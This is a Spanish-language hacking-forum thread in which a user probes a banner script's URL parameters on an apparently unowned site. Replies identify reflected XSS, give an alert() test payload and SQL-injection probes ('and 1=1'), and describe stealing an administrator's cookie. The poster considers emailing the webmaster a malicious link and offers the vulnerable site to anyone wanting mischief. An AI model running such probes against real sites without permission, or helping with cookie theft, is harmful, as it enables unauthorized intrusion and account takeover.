Foro de elhacker.net

Hola genteee..

Les comento lo que tengo...

Este link:
http://www.unsitio.com/unsitio/ver_banner2.php?archivo=xxxxxxxx&largo=yyyyyyyy&ancho=zzzzzzzzzzzzzz

me devuelve:

<html>
<head>
<title>TARJETA</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
 
<body leftmargin="0" topmargin="0">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td> <div align="left">
      <img src="./eventos/imagenes/xxxxxxxx"  width="zzzzzzzzzzzzzz" height="yyyyyyyy" />     
    </div></td>
 
  </tr>
</table>
</body>
</html>
 

------------------------
Este link:
http://www.unsitio.com/unsitio/ver_banner2.php?archivo=xxxxxxxx&largo="&ancho=zzzzzzzzzzzzzz

Devuelve:

<img src="./eventos/imagenes/xxxxxxxx"  width="zzzzzzzzzzzzzz" height="\"" /> 

------------------------
Este link:
http://www.unsitio.com/unsitio/ver_banner2.php?archivo=xxxxxxxx&largo=>&ancho=zzzzzzzzzzzzzz

Devuelve:

<img src="./eventos/imagenes/xxxxxxxx"  width="zzzzzzzzzzzzzz" height=">" />  

------------------------
Este link:
http://www.unsitio.com/unsitio/ver_banner2.php?archivo=xxxxxxxx&largo="<!--&ancho=zzzzzzzzzzzzzz

Devuelve:

<img src="./eventos/imagenes/xxxxxxxx"  width="zzzzzzzzzzzzzz" height="\"<!--" />  

Segun sus sabias miradas.. hay alguna vulnerabilidad???

AGREGO:
Si quieren que les mande mas links.. con mas pruebas. diganme que pongo..

hola, mira es algo asi como un html inyection o Xss, proba con http://www.unsitio.com/unsitio/ver_banner2.php?archivo=xxxxxxxx&largo="/><script>alert(05)</script>

si da una alerta con el num 5 es vulnerable a cross scripting, html inyection o como le quieras decir

fijate otros tipos de cadenas como php?idnoticia=33, y ahi podras inyectar,o

http://www.unsitio.com/unsitio/ver_banner2.php?archivo=1+and+1=1 te tenderia que no decir nada, y haciendo http://www.unsitio.com/unsitio/ver_banner2.php?archivo=1+and+1=0 tendria que cambiar algo.

fijate algunos tutos de por ahi

saludps

Si, el 1º dió el aviso de "5" en una alerta...

Buscaré algo de crosscripting..

Hola, sip eso es xss.
lo que puedes lograr hacer es obtener la cookie de alguien pero necesiatrías que alguien viera un link y que ese alguien esté logueado en algún sistema de administración o algo.
Busca acá:
http://foro.elhacker.net/nivel_web/temas_mas_destacados_fallas_y_explotaciones_a_nivel_web_actualizado_10809-t244090.0.html
hay buenos tutos sobre XSS.
Si tienes duda sobre alguno nos cuentas.

claro,tambien fijate si hay sql inyection que es mas provechoso  :rolleyes:


saludos

Intenta los vectores comunes, como el "power of "'"" <-agregar la comilla simple o comillas etc, ademas de ello intenta mas chars, de momento solo noto el XSS, ya nos contaras.

-berz3k.

La comilla comun, y la simple se traspasan a: \' o \"
Fijate que en el 1º psot puse el ejemplo de la comilla doble..


Y como puedo probar ello??.. dime algun codigo...

Y como podria hacer eso de las cookies??? Porque podria enviarle un e-mail de contacto al webmaster y ta vez caiga... :)



AGREGO:
El - y ; tambien entran a la perfeccion..

"dime algún codigo"  :¬¬ busca que esta lleno de tutoriales, te dejo uno de los mejores que está en este foro, solo hay que buscar http://foro.elhacker.net/hacking_avanzado/gran_tutorial_sobre_inyecciones_sql_en_mysql-t247535.0.html (http://foro.elhacker.net/hacking_avanzado/gran_tutorial_sobre_inyecciones_sql_en_mysql-t247535.0.html)

espero que sigas aprendiendo y buscando

saludos

Ahora bien.. tengo una gran duda..
Cuando mando:

http://www.unsitio.com/xxxxxx/ver_banner2.php?archivo=xxxxxxxxxxxx.jpg&largo="/><?php echo $archivo; ?><&ancho=zzzzzz

Me manda éste codigo fuente:

<html>
<head>
<title>TARJETA</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
 
<body leftmargin="0" topmargin="0">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td> <div align="left">
      <img src="./eventos/imagenes/xxxxxxxxxxxx.jpg"  width="zzzzzz" height="\"/><?php echo $archivo; ?><" />     
    </div></td>
 
  </tr>
</table>
</body>
</html>
 
 

como podria hacer para que me tome realmente eso que mandé como PHP???

Es que no hay inyección de codigo PHP si no que hay un XSS (http://es.wikipedia.org/wiki/Cross-site_scripting) que permite solo la inyección de codigo HTML ;) .

Saludos

No se puede inyectar php mas que en funciones eval ()

Buen punto... Muchas gracias..

Creo que sin poder ingresar el ' y " voy a ahcer poca cosa solo...
Mejor dejo todo tranquilo.. sin maldades..

Por las dudas, si alguien quiere hacer maldades.. que me diga por MP y le paso la web con la vulnerabilidad...

nop xD


Saludos!

Y eso amigo??? donde lo queres meter?
Acordate que todo ésto está dentro de un campo IMG

entonces:


saludos!